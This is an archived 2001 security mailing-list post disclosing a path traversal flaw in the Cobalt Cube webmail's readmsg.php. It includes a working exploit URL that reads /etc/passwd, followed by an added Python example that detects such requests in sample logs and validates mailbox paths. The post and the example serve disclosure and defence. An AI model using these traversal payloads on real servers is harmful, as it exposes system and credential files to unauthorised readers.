I confirmed this on Cobalt's, now Sun, Cube III.

Paul Marshall wrote:
>
> At 08:41 05/07/2001, you wrote:
> I just got a new Cobalt Cube today and I have been poking around at it
> for security issues... I noticed this minor issue in the webmail system.
> Your users are not allowed to have shell access by default; however, if they
> malform their mailbox requests they can read local files with the perms
> of the webserver. If your users have shell access they will not really
> be gaining anything; however, this could be used to remotely gather
> information for a future attack.
>
> [admin admin]$ uname -a
> Linux cube.ckfr.com 2.2.16C7 #1 Fri Sep 8 15:58:03 PDT 2000 i586 unknown
> [admin admin]$ cat /etc/issue
>
> Cobalt Linux release 6.0 (Carmel)
> Kernel 2.2.16C7 on an i586
>
> http://YOURCOBALTBOX:444/base/webmail/readmsg.php?mailbox=../../../../../../
> ../../../../../../../../etc/passwd&id=1
>
> -KF

--
The events which transpired five thousand years ago; five years ago or
five minutes ago, have determined what will happen five minutes from now;
five years from now or five thousand years from now. All history is a
current event.
- Dr John Henrik Clarke
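An added defender-side example, not part of the original post or of Cobalt's webmail code: it scans constructed access-log lines for readmsg.php requests whose mailbox parameter tries to leave the mailbox directory (including double-encoded forms), and shows the containment check a fixed readmsg.php would apply before opening a mailbox. MAIL_BASE and the log lines are assumptions.

```python
import os
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Common Log Format: host ident user [time] "METHOD target HTTP/x" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) \S+" (\d{3}) \S+$')

# Constructed sample access log (not real traffic); line 2 mirrors the request in the post.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Jul/2001:08:41:02 -0700] "GET /base/webmail/readmsg.php?mailbox=INBOX&id=1 HTTP/1.0" 200 2311
10.0.0.9 - - [05/Jul/2001:08:43:17 -0700] "GET /base/webmail/readmsg.php?mailbox=../../../../../../../../etc/passwd&id=1 HTTP/1.0" 200 1187
10.0.0.9 - - [05/Jul/2001:08:44:01 -0700] "GET /base/webmail/readmsg.php?mailbox=..%252F..%252Fetc%252Fshadow&id=1 HTTP/1.0" 403 214
10.0.0.7 - - [05/Jul/2001:08:45:30 -0700] "GET /base/webmail/index.php HTTP/1.0" 200 5120
"""

# Hypothetical per-user mailbox directory on the Cube (assumption, not from the post).
MAIL_BASE = "/srv/cobalt-mail/admin"


def decode_mailbox(value):
    """Decode twice so a double-encoded '..%252F' is not missed."""
    return unquote(unquote(value))


def mailbox_is_traversal(value):
    """True if the mailbox name is absolute or contains a '..' path segment."""
    decoded = decode_mailbox(value).replace("\\", "/")
    return decoded.startswith("/") or ".." in decoded.split("/")


def find_traversal_requests(log_text):
    """Return (client, status, decoded mailbox) for readmsg.php hits that traverse."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, target, status = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith("/readmsg.php"):
            continue
        for value in parse_qs(parts.query).get("mailbox", []):
            if mailbox_is_traversal(value):
                hits.append((client, int(status), decode_mailbox(value)))
    return hits


def resolve_mailbox(base_dir, value):
    """Server-side fix: resolve the requested mailbox and refuse any path that
    does not stay inside base_dir. Returns the safe path, or None if rejected."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, decode_mailbox(value)))
    return candidate if os.path.commonpath([base, candidate]) == base else None
```

Run `find_traversal_requests(SAMPLE_LOG)` against a real access log to surface past attempts; a 200 status on a traversing request is the signal that the file was actually served.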
This archive was generated by hypermail 2b30 : Tue Jul 10 2001 - 00:58:59 PDT